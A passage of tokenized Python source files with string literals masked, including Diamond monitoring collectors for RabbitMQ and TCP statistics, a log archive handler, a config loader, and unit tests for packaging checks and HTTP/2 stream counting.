<EOL> '<STR_LIT>' , account , <EOL> '<STR_LIT>' , self . config [ '<STR_LIT:password>' ] , <EOL> '<STR_LIT>' , container ] <EOL> p = Popen ( cmd , stdout = PIPE , stderr = PIPE ) <EOL> stdout , stderr = p . communicate ( ) <EOL> stats = { } <EOL> for line in stdout . split ( '<STR_LIT:\n>' ) : <EOL> if line : <EOL> line = line . split ( '<STR_LIT::>' , <NUM_LIT:2> ) <EOL> stats [ line [ <NUM_LIT:0> ] . strip ( ) ] = line [ <NUM_LIT:1> ] . strip ( ) <EOL> key = '<STR_LIT>' % ( self . config [ '<STR_LIT>' ] , <EOL> container ) <EOL> self . publish ( '<STR_LIT>' % key , stats [ '<STR_LIT>' ] ) <EOL> self . publish ( '<STR_LIT>' % key , stats [ '<STR_LIT>' ] ) <EOL> self . publish ( '<STR_LIT>' % key , stats [ '<STR_LIT>' ] ) </s>
<s> """<STR_LIT>""" <EOL> import diamond . collector <EOL> import re <EOL> from urlparse import urljoin <EOL> from urllib import quote <EOL> import urllib2 <EOL> from base64 import b64encode <EOL> try : <EOL> import json <EOL> except ImportError : <EOL> import simplejson as json <EOL> class RabbitMQClient ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , host , user , password , timeout = <NUM_LIT:5> , scheme = "<STR_LIT:http>" ) : <EOL> self . base_url = '<STR_LIT>' % ( scheme , host ) <EOL> self . timeout = timeout <EOL> self . _authorization = '<STR_LIT>' + b64encode ( '<STR_LIT>' % ( user , password ) ) <EOL> def do_call ( self , path ) : <EOL> url = urljoin ( self . base_url , path ) <EOL> req = urllib2 . Request ( url ) <EOL> req . add_header ( '<STR_LIT>' , self . _authorization ) <EOL> return json . load ( urllib2 . urlopen ( req , timeout = self . timeout ) ) <EOL> def get_all_vhosts ( self ) : <EOL> return self . do_call ( '<STR_LIT>' ) <EOL> def get_vhost_names ( self ) : <EOL> return [ i [ '<STR_LIT:name>' ] for i in self . get_all_vhosts ( ) ] <EOL> def get_queues ( self , vhost = None ) : <EOL> path = '<STR_LIT>' <EOL> if vhost : <EOL> vhost = quote ( vhost , '<STR_LIT>' ) <EOL> path += '<STR_LIT>' % vhost <EOL> queues = self . do_call ( path ) <EOL> return queues or [ ] <EOL> def get_overview ( self ) : <EOL> return self . do_call ( '<STR_LIT>' ) <EOL> def get_nodes ( self ) : <EOL> return self . do_call ( '<STR_LIT>' ) <EOL> def get_node ( self , node ) : <EOL> return self . do_call ( '<STR_LIT>' % node ) <EOL> class RabbitMQCollector ( diamond . collector . Collector ) : <EOL> def get_default_config_help ( self ) : <EOL> config_help = super ( RabbitMQCollector , self ) . get_default_config_help ( ) <EOL> config_help . update ( { <EOL> '<STR_LIT:host>' : '<STR_LIT>' , <EOL> '<STR_LIT:user>' : '<STR_LIT>' , <EOL> '<STR_LIT:password>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> } ) <EOL> return config_help <EOL> def get_default_config ( self ) : <EOL> """<STR_LIT>""" <EOL> config = super ( RabbitMQCollector , self ) . get_default_config ( ) <EOL> config . update ( { <EOL> '<STR_LIT:path>' : '<STR_LIT>' , <EOL> '<STR_LIT:host>' : '<STR_LIT>' , <EOL> '<STR_LIT:user>' : '<STR_LIT>' , <EOL> '<STR_LIT:password>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : '<STR_LIT:http>' , <EOL> } ) <EOL> return config <EOL> def collect_health ( self ) : <EOL> health_metrics = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> try : <EOL> client = RabbitMQClient ( self . config [ '<STR_LIT:host>' ] , <EOL> self . config [ '<STR_LIT:user>' ] , <EOL> self . config [ '<STR_LIT:password>' ] , <EOL> scheme = self . config [ '<STR_LIT>' ] ) <EOL> node_name = client . get_overview ( ) [ '<STR_LIT>' ] <EOL> node_data = client . get_node ( node_name ) <EOL> for metric in health_metrics : <EOL> self . publish ( '<STR_LIT>' . format ( metric ) , node_data [ metric ] ) <EOL> if self . config [ '<STR_LIT>' ] : <EOL> self . publish ( '<STR_LIT>' , <EOL> len ( node_data [ '<STR_LIT>' ] ) ) <EOL> content = client . get_nodes ( ) <EOL> self . publish ( '<STR_LIT>' , len ( content ) ) <EOL> except Exception , e : <EOL> self . log . error ( '<STR_LIT>' , e ) <EOL> return { } <EOL> def collect ( self ) : <EOL> self . collect_health ( ) <EOL> matchers = [ ] <EOL> if self . config [ '<STR_LIT>' ] : <EOL> for reg in self . config [ '<STR_LIT>' ] . split ( ) : <EOL> matchers . append ( re . compile ( reg ) ) <EOL> try : <EOL> client = RabbitMQClient ( self . config [ '<STR_LIT:host>' ] , <EOL> self . config [ '<STR_LIT:user>' ] , <EOL> self . config [ '<STR_LIT:password>' ] , <EOL> scheme = self . config [ '<STR_LIT>' ] ) <EOL> legacy = False <EOL> if '<STR_LIT>' not in self . config : <EOL> legacy = True <EOL> if '<STR_LIT>' in self . config : <EOL> vhost_conf = { "<STR_LIT:*>" : self . config [ '<STR_LIT>' ] } <EOL> else : <EOL> vhost_conf = { "<STR_LIT:*>" : "<STR_LIT>" } <EOL> if not legacy : <EOL> vhost_names = client . get_vhost_names ( ) <EOL> if "<STR_LIT:*>" in self . config [ '<STR_LIT>' ] : <EOL> for vhost in vhost_names : <EOL> if vhost not in self . config [ '<STR_LIT>' ] : <EOL> self . config [ '<STR_LIT>' ] [ vhost ] = self . config [ <EOL> '<STR_LIT>' ] [ '<STR_LIT:*>' ] <EOL> del self . config [ '<STR_LIT>' ] [ "<STR_LIT:*>" ] <EOL> vhost_conf = self . config [ '<STR_LIT>' ] <EOL> for vhost in vhost_conf : <EOL> vhost_name = vhost <EOL> if self . config [ '<STR_LIT>' ] : <EOL> vhost_name = vhost_name . replace ( <EOL> '<STR_LIT:.>' , self . config [ '<STR_LIT>' ] ) <EOL> if self . config [ '<STR_LIT>' ] : <EOL> vhost_name = vhost_name . replace ( <EOL> '<STR_LIT:/>' , self . config [ '<STR_LIT>' ] ) <EOL> queues = vhost_conf [ vhost ] <EOL> if queues == "<STR_LIT:*>" : <EOL> queues = "<STR_LIT>" <EOL> allowed_queues = queues . split ( ) <EOL> if legacy : <EOL> vhost = None <EOL> for queue in client . get_queues ( vhost ) : <EOL> if ( ( queue [ '<STR_LIT:name>' ] not in allowed_queues and <EOL> len ( allowed_queues ) > <NUM_LIT:0> ) ) : <EOL> continue <EOL> if matchers and any ( <EOL> [ m . match ( queue [ '<STR_LIT:name>' ] ) for m in matchers ] ) : <EOL> continue <EOL> for key in queue : <EOL> prefix = "<STR_LIT>" <EOL> if not legacy : <EOL> prefix = "<STR_LIT>" % ( vhost_name , "<STR_LIT>" ) <EOL> queue_name = queue [ '<STR_LIT:name>' ] <EOL> if self . config [ '<STR_LIT>' ] : <EOL> queue_name = queue_name . replace ( <EOL> '<STR_LIT:.>' , self . config [ '<STR_LIT>' ] ) <EOL> if self . config [ '<STR_LIT>' ] : <EOL> queue_name = queue_name . replace ( <EOL> '<STR_LIT:/>' , self . config [ '<STR_LIT>' ] ) <EOL> name = '<STR_LIT>' . format ( prefix , queue_name ) <EOL> self . _publish_metrics ( name , [ ] , key , queue ) <EOL> overview = client . get_overview ( ) <EOL> for key in overview : <EOL> self . _publish_metrics ( '<STR_LIT>' , [ ] , key , overview ) <EOL> except Exception , e : <EOL> self . log . error ( '<STR_LIT>' , e ) <EOL> return { } <EOL> def _publish_metrics ( self , name , prev_keys , key , data ) : <EOL> """<STR_LIT>""" <EOL> value = data [ key ] <EOL> keys = prev_keys + [ key ] <EOL> if isinstance ( value , dict ) : <EOL> for new_key in value : <EOL> self . _publish_metrics ( name , keys , new_key , value ) <EOL> elif isinstance ( value , ( float , int , long ) ) : <EOL> joined_keys = '<STR_LIT:.>' . join ( keys ) <EOL> if name : <EOL> publish_key = '<STR_LIT>' . format ( name , joined_keys ) <EOL> else : <EOL> publish_key = joined_keys <EOL> if isinstance ( value , bool ) : <EOL> value = int ( value ) <EOL> self . publish ( publish_key , value ) </s>
<s> from test import CollectorTestCase <EOL> from test import get_collector_config <EOL> from test import unittest <EOL> from mock import Mock <EOL> from mock import patch <EOL> try : <EOL> from cStringIO import StringIO <EOL> except ImportError : <EOL> from StringIO import StringIO <EOL> from tcp import TCPCollector <EOL> class TestTCPCollector ( CollectorTestCase ) : <EOL> def setUp ( self , allowed_names = None ) : <EOL> if not allowed_names : <EOL> allowed_names = [ ] <EOL> config = get_collector_config ( '<STR_LIT>' , { <EOL> '<STR_LIT>' : allowed_names , <EOL> '<STR_LIT>' : <NUM_LIT:1> <EOL> } ) <EOL> self . collector = TCPCollector ( config , None ) <EOL> def test_import ( self ) : <EOL> self . assertTrue ( TCPCollector ) <EOL> @ patch ( '<STR_LIT>' , Mock ( return_value = True ) ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_should_open_proc_net_netstat ( self , publish_mock , open_mock ) : <EOL> TCPCollector . PROC = [ '<STR_LIT>' ] <EOL> open_mock . return_value = StringIO ( '<STR_LIT>' ) <EOL> self . collector . collect ( ) <EOL> open_mock . assert_called_once_with ( '<STR_LIT>' ) <EOL> @ patch ( '<STR_LIT>' , Mock ( return_value = True ) ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_should_work_with_synthetic_data ( self , publish_mock , open_mock ) : <EOL> TCPCollector . PROC = [ '<STR_LIT>' ] <EOL> self . setUp ( [ '<STR_LIT:A>' , '<STR_LIT:C>' ] ) <EOL> open_mock . return_value = StringIO ( '''<STR_LIT>''' . strip ( ) ) <EOL> self . collector . collect ( ) <EOL> self . assertPublishedMany ( publish_mock , { } ) <EOL> open_mock . return_value = StringIO ( '''<STR_LIT>''' . strip ( ) ) <EOL> self . collector . collect ( ) <EOL> self . assertEqual ( len ( publish_mock . call_args_list ) , <NUM_LIT:2> ) <EOL> metrics = { <EOL> '<STR_LIT:A>' : <NUM_LIT:0> , <EOL> '<STR_LIT:C>' : <NUM_LIT:2> , <EOL> } <EOL> self . assertPublishedMany ( publish_mock , metrics ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_should_work_with_real_data ( self , publish_mock ) : <EOL> self . setUp ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> TCPCollector . PROC = [ self . getFixturePath ( '<STR_LIT>' ) ] <EOL> self . collector . collect ( ) <EOL> self . assertPublishedMany ( publish_mock , { } ) <EOL> TCPCollector . PROC = [ self . getFixturePath ( '<STR_LIT>' ) ] <EOL> self . collector . collect ( ) <EOL> metrics = { <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> <EOL> } <EOL> self . assertPublishedMany ( publish_mock , metrics ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_should_work_with_all_data ( self , publish_mock ) : <EOL> self . setUp ( [ ] ) <EOL> TCPCollector . PROC = [ <EOL> self . getFixturePath ( '<STR_LIT>' ) , <EOL> self . getFixturePath ( '<STR_LIT>' ) , <EOL> ] <EOL> self . collector . collect ( ) <EOL> self . assertPublishedMany ( publish_mock , { } ) <EOL> TCPCollector . PROC = [ <EOL> self . getFixturePath ( '<STR_LIT>' ) , <EOL> self . getFixturePath ( '<STR_LIT>' ) , <EOL> ] <EOL> self . collector . collect ( ) <EOL> metrics = { <EOL> '<STR_LIT>' : <NUM_LIT:0.0> , <EOL> '<STR_LIT>' : <NUM_LIT:0.0> , <EOL> '<STR_LIT>' : <NUM_LIT:0.0> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : ( - <NUM_LIT:1.0> ) , <EOL> '<STR_LIT>' : <NUM_LIT:0.0> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:0.0> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:0.0> , <EOL> '<STR_LIT>' : <NUM_LIT:0.0> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:0.0> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:0.0> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:0.0> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:0.0> , <EOL> '<STR_LIT>' : <NUM_LIT:0.0> , <EOL> '<STR_LIT>' : <NUM_LIT:0.0> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:0.0> , <EOL> '<STR_LIT>' : <NUM_LIT:0.0> , <EOL> '<STR_LIT>' : <NUM_LIT:0.0> , <EOL> '<STR_LIT>' : <NUM_LIT:0.0> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:0.0> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:0.0> , <EOL> '<STR_LIT>' : <NUM_LIT:0.0> , <EOL> '<STR_LIT>' : <NUM_LIT:0.0> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:0.0> , <EOL> '<STR_LIT>' : <NUM_LIT:0.0> , <EOL> '<STR_LIT>' : <NUM_LIT:0.0> , <EOL> '<STR_LIT>' : <NUM_LIT:0.0> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:0.0> , <EOL> '<STR_LIT>' : <NUM_LIT:0.0> , <EOL> '<STR_LIT>' : <NUM_LIT:0.0> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:0.0> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:0.0> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:0.0> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:0.0> , <EOL> '<STR_LIT>' : <NUM_LIT:0.0> , <EOL> '<STR_LIT>' : <NUM_LIT:0.0> , <EOL> '<STR_LIT>' : <NUM_LIT:0.0> , <EOL> '<STR_LIT>' : <NUM_LIT:0.0> , <EOL> '<STR_LIT>' : <NUM_LIT:0.0> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:0.0> , <EOL> '<STR_LIT>' : <NUM_LIT:0.0> , <EOL> '<STR_LIT>' : <NUM_LIT:0.0> , <EOL> '<STR_LIT>' : <NUM_LIT:0.0> , <EOL> '<STR_LIT>' : <NUM_LIT:0.0> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:0.0> , <EOL> '<STR_LIT>' : <NUM_LIT:1.0> , <EOL> '<STR_LIT>' : <NUM_LIT:0.0> , <EOL> '<STR_LIT>' : <NUM_LIT:0.0> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:0.0> , <EOL> '<STR_LIT>' : <NUM_LIT:0.0> , <EOL> '<STR_LIT>' : <NUM_LIT:0.0> , <EOL> '<STR_LIT>' : <NUM_LIT:0.0> , <EOL> '<STR_LIT>' : <NUM_LIT:0.0> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:0.0> , <EOL> '<STR_LIT>' : <NUM_LIT:0.0> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:0.0> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> } <EOL> self . setDocExample ( collector = self . collector . __class__ . __name__ , <EOL> metrics = metrics , <EOL> defaultpath = self . collector . config [ '<STR_LIT:path>' ] ) <EOL> self . assertPublishedMany ( publish_mock , metrics ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> unittest . main ( ) </s>
<s> """<STR_LIT>""" <EOL> from Handler import Handler <EOL> import logging <EOL> import logging . handlers <EOL> class ArchiveHandler ( Handler ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , config ) : <EOL> """<STR_LIT>""" <EOL> Handler . __init__ ( self , config ) <EOL> self . archive = logging . getLogger ( '<STR_LIT>' ) <EOL> self . archive . setLevel ( logging . DEBUG ) <EOL> self . archive . propagate = self . config [ '<STR_LIT>' ] <EOL> formatter = logging . Formatter ( '<STR_LIT>' ) <EOL> handler = logging . handlers . TimedRotatingFileHandler ( <EOL> filename = self . config [ '<STR_LIT>' ] , <EOL> when = '<STR_LIT>' , <EOL> interval = <NUM_LIT:1> , <EOL> backupCount = int ( self . config [ '<STR_LIT>' ] ) , <EOL> encoding = self . config [ '<STR_LIT>' ] <EOL> ) <EOL> handler . setFormatter ( formatter ) <EOL> handler . setLevel ( logging . DEBUG ) <EOL> self . archive . addHandler ( handler ) <EOL> def get_default_config_help ( self ) : <EOL> """<STR_LIT>""" <EOL> config = super ( ArchiveHandler , self ) . get_default_config_help ( ) <EOL> config . update ( { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } ) <EOL> return config <EOL> def get_default_config ( self ) : <EOL> """<STR_LIT>""" <EOL> config = super ( ArchiveHandler , self ) . get_default_config ( ) <EOL> config . update ( { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:7> , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : False , <EOL> } ) <EOL> return config <EOL> def process ( self , metric ) : <EOL> """<STR_LIT>""" <EOL> self . archive . info ( str ( metric ) . strip ( ) ) </s>
<s> import configobj <EOL> import os <EOL> def str_to_bool ( value ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( value , basestring ) : <EOL> value = value . strip ( ) . lower ( ) <EOL> if value in [ '<STR_LIT:true>' , '<STR_LIT:t>' , '<STR_LIT:yes>' , '<STR_LIT:y>' ] : <EOL> return True <EOL> elif value in [ '<STR_LIT:false>' , '<STR_LIT:f>' , '<STR_LIT>' , '<STR_LIT:n>' , '<STR_LIT>' ] : <EOL> return False <EOL> else : <EOL> raise NotImplementedError ( "<STR_LIT>" % value ) <EOL> return value <EOL> def load_config ( configfile ) : <EOL> """<STR_LIT>""" <EOL> configfile = os . path . abspath ( configfile ) <EOL> config = configobj . ConfigObj ( configfile ) <EOL> config_extension = '<STR_LIT>' <EOL> if '<STR_LIT>' in config : <EOL> config_extension = config [ '<STR_LIT>' ] . get ( '<STR_LIT>' , config_extension ) <EOL> if '<STR_LIT:path>' in config [ '<STR_LIT>' ] : <EOL> for cfgfile in os . listdir ( config [ '<STR_LIT>' ] [ '<STR_LIT:path>' ] ) : <EOL> cfgfile = os . path . join ( config [ '<STR_LIT>' ] [ '<STR_LIT:path>' ] , <EOL> cfgfile ) <EOL> cfgfile = os . path . abspath ( cfgfile ) <EOL> if not cfgfile . endswith ( config_extension ) : <EOL> continue <EOL> newconfig = configobj . ConfigObj ( cfgfile ) <EOL> config . merge ( newconfig ) <EOL> if '<STR_LIT>' not in config : <EOL> raise Exception ( '<STR_LIT>' % configfile ) <EOL> if '<STR_LIT>' not in config : <EOL> config [ '<STR_LIT>' ] = configobj . ConfigObj ( ) <EOL> if '<STR_LIT>' in config [ '<STR_LIT>' ] : <EOL> handlers_config_path = config [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> if os . path . exists ( handlers_config_path ) : <EOL> for cfgfile in os . listdir ( handlers_config_path ) : <EOL> cfgfile = os . path . join ( handlers_config_path , cfgfile ) <EOL> cfgfile = os . path . abspath ( cfgfile ) <EOL> if not cfgfile . endswith ( config_extension ) : <EOL> continue <EOL> filename = os . path . basename ( cfgfile ) <EOL> handler = os . path . splitext ( filename ) [ <NUM_LIT:0> ] <EOL> if handler not in config [ '<STR_LIT>' ] : <EOL> config [ '<STR_LIT>' ] [ handler ] = configobj . ConfigObj ( ) <EOL> newconfig = configobj . ConfigObj ( cfgfile ) <EOL> config [ '<STR_LIT>' ] [ handler ] . merge ( newconfig ) <EOL> if '<STR_LIT>' not in config : <EOL> config [ '<STR_LIT>' ] = configobj . ConfigObj ( ) <EOL> if '<STR_LIT>' in config [ '<STR_LIT>' ] : <EOL> collectors_config_path = config [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> if os . path . exists ( collectors_config_path ) : <EOL> for cfgfile in os . listdir ( collectors_config_path ) : <EOL> cfgfile = os . path . join ( collectors_config_path , cfgfile ) <EOL> cfgfile = os . path . abspath ( cfgfile ) <EOL> if not cfgfile . endswith ( config_extension ) : <EOL> continue <EOL> filename = os . path . basename ( cfgfile ) <EOL> collector = os . path . splitext ( filename ) [ <NUM_LIT:0> ] <EOL> if collector not in config [ '<STR_LIT>' ] : <EOL> config [ '<STR_LIT>' ] [ collector ] = configobj . ConfigObj ( ) <EOL> try : <EOL> newconfig = configobj . ConfigObj ( cfgfile ) <EOL> except Exception , e : <EOL> raise Exception ( "<STR_LIT>" % <EOL> ( cfgfile , e ) ) <EOL> config [ '<STR_LIT>' ] [ collector ] . merge ( newconfig ) <EOL> for collector in config [ '<STR_LIT>' ] : <EOL> if '<STR_LIT>' in config [ '<STR_LIT>' ] [ collector ] : <EOL> config [ '<STR_LIT>' ] [ collector ] [ '<STR_LIT>' ] = str_to_bool ( <EOL> config [ '<STR_LIT>' ] [ collector ] [ '<STR_LIT>' ] <EOL> ) <EOL> return config </s>
<s> __VERSION__ = "<STR_LIT>" </s>
<s> """<STR_LIT>""" <EOL> import pkg_resources <EOL> import unittest <EOL> from hospital . assertions import packaging <EOL> class AssertSupportedPythonVersionTestCase ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_custom_msg ( self ) : <EOL> """<STR_LIT>""" <EOL> distribution = pkg_resources . get_distribution ( '<STR_LIT>' ) <EOL> version = '<STR_LIT>' <EOL> msg = "<STR_LIT>" <EOL> with self . assertRaises ( AssertionError ) as context : <EOL> packaging . assert_supported_python_version ( <EOL> distribution , <EOL> version , <EOL> msg = msg ) <EOL> self . assertEqual ( context . exception . args [ <NUM_LIT:0> ] , msg ) </s>
<s> """<STR_LIT>""" <EOL> import pytest <EOL> import h2 <EOL> import h2 . connection <EOL> class TestComplexClient ( object ) : <EOL> """<STR_LIT>""" <EOL> example_request_headers = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:/>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:GET>' ) , <EOL> ] <EOL> example_response_headers = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> ] <EOL> def test_correctly_count_server_streams ( self , frame_factory ) : <EOL> """<STR_LIT>""" <EOL> c = h2 . connection . H2Connection ( client_side = True ) <EOL> c . initiate_connection ( ) <EOL> expected_inbound_streams = expected_outbound_streams = <NUM_LIT:0> <EOL> assert c . open_inbound_streams == expected_inbound_streams <EOL> assert c . open_outbound_streams == expected_outbound_streams <EOL> for stream_id in range ( <NUM_LIT:1> , <NUM_LIT:15> , <NUM_LIT:2> ) : <EOL> c . send_headers ( stream_id , self . example_request_headers ) <EOL> expected_outbound_streams += <NUM_LIT:1> <EOL> assert c . open_inbound_streams == expected_inbound_streams <EOL> assert c . open_outbound_streams == expected_outbound_streams <EOL> f = frame_factory . build_push_promise_frame ( <EOL> stream_id = stream_id , <EOL> promised_stream_id = stream_id + <NUM_LIT:1> , <EOL> headers = self . example_request_headers , <EOL> ) <EOL> c . receive_data ( f . serialize ( ) ) <EOL> assert c . open_inbound_streams == expected_inbound_streams <EOL> assert c . open_outbound_streams == expected_outbound_streams <EOL> f = frame_factory . build_headers_frame ( <EOL> stream_id = stream_id + <NUM_LIT:1> , <EOL> headers = self . example_response_headers , <EOL> ) <EOL> c . receive_data ( f . serialize ( ) ) <EOL> expected_inbound_streams += <NUM_LIT:1> <EOL> assert c . open_inbound_streams == expected_inbound_streams <EOL> assert c . open_outbound_streams == expected_outbound_streams <EOL> for stream_id in range ( <NUM_LIT> , <NUM_LIT:0> , - <NUM_LIT:2> ) : <EOL> c . end_stream ( stream_id ) <EOL> assert c . open_inbound_streams == expected_inbound_streams <EOL> assert c . open_outbound_streams == expected_outbound_streams <EOL> f = frame_factory . build_headers_frame ( <EOL> stream_id = stream_id , <EOL> headers = self . example_response_headers , <EOL> flags = [ '<STR_LIT>' ] , <EOL> ) <EOL> c . receive_data ( f . serialize ( ) ) <EOL> expected_outbound_streams -= <NUM_LIT:1> <EOL> assert c . open_inbound_streams == expected_inbound_streams <EOL> assert c . open_outbound_streams == expected_outbound_streams <EOL> f = frame_factory . build_headers_frame ( <EOL> stream_id = stream_id + <NUM_LIT:1> , <EOL> headers = self . example_response_headers , <EOL> flags = [ '<STR_LIT>' ] , <EOL> ) <EOL> c . receive_data ( f . serialize ( ) ) <EOL> expected_inbound_streams -= <NUM_LIT:1> <EOL> assert c . open_inbound_streams == expected_inbound_streams <EOL> assert c . open_outbound_streams == expected_outbound_streams <EOL> assert c . open_inbound_streams == <NUM_LIT:0> <EOL> assert c . open_outbound_streams == <NUM_LIT:0> <EOL> class TestComplexServer ( object ) : <EOL> """<STR_LIT>""" <EOL> example_request_headers = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:/>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:GET>' ) , <EOL> ] <EOL> example_response_headers = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> ] <EOL> def test_correctly_count_server_streams ( self , frame_factory ) : <EOL> """<STR_LIT>""" <EOL> c = h2 . connection . H2Connection ( client_side = False ) <EOL> c . receive_data ( frame_factory . preamble ( ) ) <EOL> expected_inbound_streams = expected_outbound_streams = <NUM_LIT:0> <EOL> assert c . open_inbound_streams == expected_inbound_streams <EOL> assert c . open_outbound_streams == expected_outbound_streams <EOL> for stream_id in range ( <NUM_LIT:1> , <NUM_LIT:15> , <NUM_LIT:2> ) : <EOL> f = frame_factory . build_headers_frame ( <EOL> headers = self . example_request_headers , <EOL> stream_id = stream_id , <EOL> ) <EOL> c . receive_data ( f . serialize ( ) ) <EOL> expected_inbound_streams += <NUM_LIT:1> <EOL> assert c . open_inbound_streams == expected_inbound_streams <EOL> assert c . open_outbound_streams == expected_outbound_streams <EOL> c . push_stream ( stream_id , stream_id + <NUM_LIT:1> , self . example_request_headers ) <EOL> assert c . open_inbound_streams == expected_inbound_streams <EOL> assert c . open_outbound_streams == expected_outbound_streams <EOL> c . send_headers ( stream_id + <NUM_LIT:1> , self . example_response_headers ) <EOL> expected_outbound_streams += <NUM_LIT:1> <EOL> assert c . open_inbound_streams == expected_inbound_streams <EOL> assert c . open_outbound_streams == expected_outbound_streams <EOL> for stream_id in range ( <NUM_LIT> , <NUM_LIT:0> , - <NUM_LIT:2> ) : <EOL> f = frame_factory . build_data_frame ( <EOL> data = b'<STR_LIT>' , <EOL> flags = [ '<STR_LIT>' ] , <EOL> stream_id = stream_id , <EOL> ) <EOL> c . receive_data ( f . serialize ( ) ) <EOL> assert c . open_inbound_streams == expected_inbound_streams <EOL> assert c . open_outbound_streams == expected_outbound_streams <EOL> c . send_data ( stream_id , b'<STR_LIT>' , end_stream = True ) <EOL> expected_inbound_streams -= <NUM_LIT:1> <EOL> assert c . open_inbound_streams == expected_inbound_streams <EOL> assert c . open_outbound_streams == 